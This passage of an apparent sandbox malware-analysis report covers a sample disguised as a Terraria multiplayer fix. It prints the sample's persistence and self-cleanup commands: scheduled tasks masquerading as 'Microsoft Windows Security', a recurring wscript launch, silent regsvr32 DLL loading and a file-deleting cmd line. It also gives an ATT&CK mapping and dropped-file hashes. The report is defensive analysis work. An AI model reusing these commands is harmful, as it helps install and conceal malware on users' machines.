  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
  2⤵
  PID:4484
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4512
- C:\Users\Admin\AppData\Local\Temp\297145\Cultures.pif
  C:\Users\Admin\AppData\Local\Temp\297145\Cultures.pif
  2⤵
  PID:1504

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5656

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5148 -ip 5148
1⤵
PID:540

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1336

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:892

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
- Executes dropped EXE
PID:3736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4112 -ip 4112
1⤵
PID:772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4112 -ip 4112
1⤵
PID:1360

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
- Executes dropped EXE
PID:5152

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
- Executes dropped EXE
PID:5692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6032 -ip 6032
1⤵
PID:1932

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
- Executes dropped EXE
PID:5388

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.js"
1⤵
PID:3912
- C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.scr
  "C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\Admin\AppData\Local\SkySync Technologies\e"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5160
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.scr" & rd /s /q "C:\ProgramData\CFBFHIEBKJKF" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:892
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 10
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:2156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 908 -ip 908
1⤵
PID:5800

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll
1⤵
PID:3572
- C:\Windows\SysWOW64\regsvr32.exe
  /S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll
  2⤵
  PID:3880
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll' }) { exit 0 } else { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5632
- - C:\Users\Admin\AppData\Local\Temp\79bf8674ec\Gxtuum.exe
    "C:\Users\Admin\AppData\Local\Temp\79bf8674ec\Gxtuum.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4484

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
PID:332

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll
1⤵
PID:2192
- C:\Windows\SysWOW64\regsvr32.exe
  /S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2912
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll' }) { exit 0 } else { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6004
- - C:\Users\Admin\AppData\Local\Temp\79bf8674ec\Gxtuum.exe
    "C:\Users\Admin\AppData\Local\Temp\79bf8674ec\Gxtuum.exe"
    3⤵
    PID:988

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
PID:4916

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll
1⤵
PID:3240
- C:\Windows\SysWOW64\regsvr32.exe
  /S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll
  2⤵
  PID:3500
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll' }) { exit 0 } else { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    PID:700
- - C:\Users\Admin\AppData\Local\Temp\79bf8674ec\Gxtuum.exe
    "C:\Users\Admin\AppData\Local\Temp\79bf8674ec\Gxtuum.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5492

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4468

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
PID:128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5752 -ip 5752
1⤵
PID:6024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3544 -ip 3544
1⤵
PID:5244

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll
1⤵
PID:1080
- C:\Windows\SysWOW64\regsvr32.exe
  /S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\StoutCoyote.dll' }) { exit 0 } else { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    PID:4752

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
- Network Service Discovery
PID:3104

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
PID:2096

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
PID:3572

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa388b055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c03d23a8155753f5a936bd7195e475bc

SHA1
cdf47f410a3ec000e84be83a3216b54331679d63

SHA256
6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca

SHA512
6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3d68c7edc2a288ee58e6629398bb9f7c

SHA1
6c1909dea9321c55cae38b8f16bd9d67822e2e51

SHA256
dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b

SHA512
0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
e313e950ff6ff09a2ce4ba74b27138bb

SHA1
19f32220652d2685dabbb01929e2fb94629fa6a6

SHA256
90d9826749a0274f69a5e860cca67a6ce126aa39efdb54f5aee8d2f76fd17fab

SHA512
c3bb75c6f19a28e07816a18d0dc20311440f0ab6838f141824f2ab6b2c8b8ad3cf4b948f40fe6c88f2830cb998b23981f71e8ae4b0f634a4f4d43d8a85142656

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Filesize
322B

MD5
46ff4b714a8af574d7f1e85da432c4d9

SHA1
81389ed00e250fbb28b1832c89e322b308d73b29

SHA256
e38de38c4387e5e3a89070b41bbbbe4d38117b2fccb3f0dce99e959db8db7ec1

SHA512
e63cec63a4e37fcdba8ddaf65f07b5082f55696f90c69de417bf8c1134280fa3e7e2d711da4f80b68d9f6c54a42eb5aeae4f59bf0e75805ef5c6e4e24b0a85a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Filesize
8KB

MD5
f0f8f81d3fe97142f8e516133d6d7056

SHA1
063b1fddb45e23a2774c395bb63ecf71d46ab6b3

SHA256
cb195f5f78819988fb63a8163ed75c7a1a51fb6c888b8a9f5e6451650dc781b6

SHA512
0a0e493f390fa1014ea885b71b58e26f8ab2d3ef4dcf8c195fc0d2c19ad4d21288b9a3aee8c1577dc17feaabea7e64ed2acab7846773e51bef081fd8581e4ed3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor

Filesize
36KB

MD5
5d352a03280eba57cb274d27ba6c6b7e

SHA1
8887766642a81a1248dd5f93239ce63e93839900

SHA256
3b358849502f5cfd881dd035ff274a5753f90047a131884838c677e22f2305ab

SHA512
b8037a046c4be7be120bbfddedc780a4175fc8e6c863e9095e39a4e16d2e8ced27c40f38c569a79df990057175e3db6aa35eac645598af3647caa5744052bb1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
882B

MD5
187ae8e0d9b74b5300d7bb288bf1463b

SHA1
a2c10431aa2453682200abfc6849cee1d762b740

SHA256
e79ba7f732ce000636a4103534ded20734133c7d797043115cd3f8fd2af82de7

SHA512
0ca2f4c4bc6aa2dea7e4ead21649ae0218fa8b7521727fcb5b1af7b81f4b3ef79baddfc8508242f3d100a410237f99987b2c31f0e0ea563f83ff9f6c32590e84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
854f3fd4d21026e337a36b2657d1d26e

SHA1
116e7e60c334edced5d373bcef9ca5c855df9794

SHA256
a15b9cf0078fd7c59a3b70f1f3377c09df68910261398b97840b746691975ef5

SHA512
5d9693a1e8fa6fcb6ac80c2d40581735df0387305f6bf22346bb0ea805332d62e490c97c1f035a893e5ec826aad5071fee9264e1ae41056fb1959edc45ad3cb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f30f1d1e6979e3fc3728005bbc28577c

SHA1
c6325effd3acf91e9226b58747c62402cc2f6301

SHA256
238cd81fa3847bb10a64265f777154992bb0962a2c766ee1ba36a0e7d42bec53

SHA512
b2aeab558a96a04eb77eb9ff1798108e846e7c65398d6b5b377c3c9e858cada4d74968161626a366deab43d95bd00634220d2e9459fe9608eb47ba9d98adbc72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13377139841236955

Filesize
16KB

MD5
7645f3b770200c30cf59cb9c6e9deae8

SHA1
013af7c54ff730658405a707acb3ab1469a74f06

SHA256
a27333c4a4f45ec8a4aed4e6ea4b7db0e12af08485b0a818abe612a9b9c88905

SHA512
1e7d307ee5080d4b3aa426278daf0590b56bb4c8c7df429a43b9262e8df8479c2a01207d9ca5101be028f5fc47254f87d22f44fad17eeda1ab57598e569813ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13377139841388955

Filesize
717B

MD5
7c4438ba642f20fc8a9e94d883539012

SHA1
722d7cb5cf8fadd91be94e47d8fbedb12f6e7015

SHA256
ad1fb33f8d308e9daa3b97bf5a8c1faf62b1a2c2209eea68f0dec5377ec9ded5

SHA512
b831c458fb03409e9a2823742b93c5f3990f6b3857cbf7d2896e03a34a8393d4855e9412aace85276d097dfc41ed0f1592602eaf296026af08cc70e3ec6f26b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Filesize
20KB

MD5
8be985ece811ba0a3f10087f5f4e6fd4

SHA1
c87c84d4fe182ffb8362f3cabd33349af94e9b55

SHA256
da78d36c765d3248b1a72ead5f83b7a58cba7d361f17a6831332ee994cee939a

SHA512
901932baea8712e89188cfce00a6b2388ba38697bcbfeebcf8b83b88b0cb26c7323b098ba6983c312ded1041f6e297412010113a32e99a9350aa4492ca40efa9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
1c2f0f890a76d620694e0363b99752db

SHA1
42cae0964b24e149333fdbf71893dccfb22ebf27

SHA256
70a4d3ca58542be26d2ea042e2437fe4c973e412a1648857ac8586f2d4e4ffca

SHA512
080fd08af81246659bf6a13ac2261c41bc240d065bac5dce8ffde31d69c80b6d39d69079f89b092dcea5ef367af5678327c1f4c4d28ad73a272829fed654e48d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
0f1d466beba8ee61255d52f5711af6d3

SHA1
50350c9f9e392a77c5f74fd35be66b63fc3abe69

SHA256
d43ed9d9298bc9a6f64f5c517790ae356d59abde8751bab48d34daf28af91637

SHA512
114f6b4dab65e51e5d865fcf22311d7d972f12a0fd9977b9cbf64dfce753280858337a4ee79e7abf2001eb6072052a28b257c192b7f5189fed564a4362cd72da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

Filesize
128KB

MD5
727f4df35a27895529a59b5297881e86

SHA1
73e8ea32dd2166c9c32f94ba579c8c18207441d9

SHA256
981684795a5820e8857ef523901fcac69d4077d4454b7403263fa18819ce694e

SHA512
a1ceb56bb343a117785a3e005e604ab0fb68db14593b3fe3bd4580bb845f2bc0caf7fe0d3f57921260460649ec7bd1de11b416e9ada3aba4c7c107c8d6e6ee3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG

Filesize
136B

MD5
3230a75888a98a98583a2370b5695681

SHA1
4f37f9a7443835330359f6c91e8e4d58648c1cf5

SHA256
b23808bf1c43f8402c157a11ece1cea2344a6bafecef90981d6498530063a147

SHA512
bc7c35a063ff36ae4671996fbb89643c4d32596793603e747a77df68c80048b1bdd15a9bae9ad06ca8441939bd2a1e4d81f22eb8ca308c029f6280e666f4fde5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000004

Filesize
50B

MD5
031d6d1e28fe41a9bdcbd8a21da92df1

SHA1
38cee81cb035a60a23d6e045e5d72116f2a58683

SHA256
b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da

SHA512
e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Filesize
241KB

MD5
4d37439f248b53000f12fa88efcd79f1

SHA1
4679882fa900c037aaa8f9b77a255b7aaa8c5386

SHA256
448d6c44ee552c2749a965e4f5738d0eb6a2225ce9d4d3b09c329243121c4740

SHA512
421a9d46c12b67df5483896d8032af01d3f304c87732f6f4f8fb6d393da4d223175fe1ab1c75915673df34d3974ca6e4d32c5981985f8170fb4ee8a61e150409

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Filesize
76B

MD5
cc4a8cff19abf3dd35d63cff1503aa5f

SHA1
52af41b0d9c78afcc8e308db846c2b52a636be38

SHA256
cc5dacf370f324b77b50dddf5d995fd3c7b7a587cb2f55ac9f24c929d0cd531a

SHA512
0e9559cda992aa2174a7465745884f73b96755008384d21a0685941acf099c89c8203b13551de72a87b8e23cdaae3fa513bc700b38e1bf3b9026955d97920320

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Filesize
319B

MD5
5bedb47360d55444061d760c63da0edb

SHA1
f236357d771670a4a5dcb5f64c150f91c608c4f7

SHA256
4511a5f5f4d55b6b3addd87779796d38448b68f468abad678e4dd125c4694ceb

SHA512
1eed0e27fb72121e1fef6618de26e5225741c730063c0f6ba7727d516150b5e9cc22416f80f759446b031d03b24cbde795769ee1e04c0df067418293b99238a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Filesize
318B

MD5
a2494b2c10fc11df5080e6b0fd0f170a

SHA1
76e2dcc70c2d3f9c13c6687747ed0335f4cb4fe0

SHA256
c1f20664d37afd79e01814941bc86e1cda5159e196f963e2e1069bb82d1df865

SHA512
7c1c362fd279fed38dbb732851c29a56ce3d0aa5e7b4a196240e6b466910a4809879352d799a028fa74aa0aed6388108995f378fc4db92791bdac33c8b6056a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Filesize
337B

MD5
1bcac4294d6a9b83a88fbb365887fde5

SHA1
25b868cecd77544408b5fd4431ccf738cc2058a2

SHA256
d4b1d892b951ececc66cad63c8cb08accb079b9324ac9fa232c132294bae319e

SHA512
76fc9f3488eb732a185de74643948ab3437772d85d9b360ecb33579601d74c66bbdfb403463eb70ce29abf3e24b94aa25e95ec6c6cfe1fcd474252409bca12b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Functional Data-wal

Filesize
4KB

MD5
d2fb9df61ecc6e4a0a48fbfc8015b5c1

SHA1
c90fd744a2f3c155c4b4a44b744a487fe4a1e668

SHA256
d1bc9961ff9ec8351286d76a15d1622a72db645add083ea3f20e2ba9213c41fc

SHA512
f256946c1985cb58469d0c7764dde4f0ecc0bfbdd8a3923ee5592f8909b2d90d848edf4ce62808447c9f59926c01f84798a18ad2704b85c791cade1b44dfd265

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data-wal

Filesize
4KB

MD5
ab4b34d74be4e4901f73d02cf4fdd756

SHA1
92d0548264976eecaa746c1fab89218f09ac00c7

SHA256
007c58f186a349efce7d6afaf3e2a409f57c69433290b83f02def090e5f36ca4

SHA512
e5962ca7f291b10fce74a6a82a7f625ceb1beadd7496096e68ac41e58832e8d4d80d591ec16a0b8541028233619d35abe125aaeeee8e683bb6c7fbdfddbfea67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
1bd5ce46943f420dea93b9f9cf9619a1

SHA1
59bcf162bc52d17e4e8e8dff92e111fded73ce02

SHA256
1516b134f710fbe600a2881aa345312559700f93989dafdce4d897bcee5ff077

SHA512
dcc5bcf0c48a03ddbaa58e4844609d74c438f6aeecd6259a0c29d665e48e90e7e24e4562fe6d78ca69b5ad1ca11b0d9028f45aece80e15563bb579b23b5311ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
35a4eab76b2a4230c5255a9dd3d1e2d3

SHA1
bc2fe69735824da5e1be02069747bb0a6c5f52e4

SHA256
a9bdd6eb96c924703c14a91fceea7fa8cd3bb5ca0683fc23267a50883fb3ddeb

SHA512
c6e05c3e0bb0ad592cab31237cad5f9e031451592f37a23119a12810fd7ab27256cfac377905abfb566cc7a989daf6ff005c8ae121612b778d65b7d4bc965515

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

Filesize
4.0MB

MD5
7d5d031d1eab4e9d1765541abe2876b4

SHA1
9ab016b4c9dd5594a5d970718b2e1fe05d60035a

SHA256
bef54adda1b8f37ae3f5ce0f5e8f19954aaf3f7e18e1d7efe4d47a9a95a17fab

SHA512
73d7a947701f6cdc709546bed777579a6a80ddde6c49b573246dbe270bb1794960f67773ea91a0fdaed618026f062c068254cb3abe04df1d7b796bb840295b8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
f74a97d2ad239e93080c11ebdb66d556

SHA1
e880a5a8f669823f0ae4e22d148bf7111b337f70

SHA256
eea77459afe0398dc21890b468b4393b622cf20493f68edf94cfaafd3a7b3751

SHA512
5fb99f0640512b5b2a6687a01a9db643d79c93d567c268f3a181a243c13fdb3c91e174df6d3f083855efc079191d71dfb53ad8a783e9e862eb79f6f3628f5dd1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
612b42b28a09de922098c51da868aa49

SHA1
444685a488c218f5018276e7adf4ee8393604359

SHA256
1e5f5cf2e34cf5761167131a80f320f6a7ef886ad5e664e3f4c0d722ca38d307

SHA512
6f28664b08b4a1c9eea4cc77a252beda6ddcbef50beb0ff7ef8c40dfb7617b2ebceabb81b17bc33d0b4f48016afcee2da15d41b8e59999f3ebb3c596203112d2

Download Submit
C:\Users\Admin\AppData\Local\SkySync Technologies\SkySync.scr

Filesize
872KB

MD5
18ce19b57f43ce0a5af149c96aecc685

SHA1
1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

SHA256
d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

SHA512
a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

Download Submit
C:\Users\Admin\AppData\Local\Temp\10000270101\Javvvum.exe

Filesize
7.3MB

MD5
aed024049f525c8ae6671ebdd7001c30

SHA1
fadd86e0ce140dc18f33193564d0355b02ee9b05

SHA256
9c45c5456167f65156faa1313ad8bbaffb8aa375669bf756fe0273580a621494

SHA512
ec0846be717d200639c529a4ac14f47f6b466fa2c8231049bc474183b285c7d8ce3200ff9f9c813171de8b7eb15c63f229b4748c751a167d7eff3489249738d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\10000281101\stail.exe

Filesize
3.9MB

MD5
982b28b7a4ddf710c387bc1de86012fa

SHA1
cd16c3b0023aba3b81f76e62f3538a626b853e3f

SHA256
8dc08f6b4e5ef0c645d5d2715570245dec0ead9e8901a5a53628bc87af8d4cae

SHA512
f6ef7da09d2ea6c70a1be8bdcec4e18b7d87b9e0b4ec7f4c84aa26a3afdc140600c86a700b5a2ecedd7bfe1cd446222cbbbf2840e6737012d1d0f09be45f4f49

Download Submit
C:\Users\Admin\AppData\Local\Temp\79bf8674ec\Gxtuum.exe

Filesize
21KB

MD5
d964cec6b322a2a14f8b477ce88c6e4f

SHA1
0d04a52fc89e3817870637a6d5aad191d909c605

SHA256
efd5df81a12ca00d70e7eff61311d6c097d2455f6edc0c224288e85b27437202

SHA512
394615997bacdd2b084964ae4e59da0bb9c46d1be31d1527f81f33ce947abf33655342b7293feb01ed8fd72edda0e97c96c8dc9216a1589be9b1d2178fb27028

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\02.08.2022.exe

Filesize
